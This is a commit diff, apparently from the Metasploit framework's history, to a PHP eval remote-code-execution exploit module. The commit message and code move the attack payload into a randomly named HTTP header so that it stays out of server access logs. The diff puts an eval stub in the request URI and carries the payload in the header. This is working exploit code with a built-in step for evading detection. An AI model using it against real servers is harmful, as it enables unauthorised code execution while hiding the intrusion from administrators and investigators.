move the payload into a random X- header so it doesn't show up in access logs

git-svn-id: file:///home/svn/framework3/trunk@6493 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2009-04-19 15:47:14 +00:00 · 2009-04-19 15:47:14 +00:00 · b31abbc6f9
commit b31abbc6f9
parent ba3627aa9b
1 changed files with 12 additions and 3 deletions
--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@ -60,9 +60,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# sending a socket payload
 		timeout = 0.01

-		uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(payload.encoded))
-		response = send_request_raw({ 'uri' => uri },timeout)
+		headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
+		stub = "eval($_SERVER['HTTP_#{headername.gsub("-", "_")}']);"
+
+		uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
+		response = send_request_raw({ 
+				'uri' => uri,
+				'headers' => { 
+						headername => payload.encoded,
+						'Connection' => 'close'
+					}
+			},timeout)
 		
 		handler
 	end
-end
+end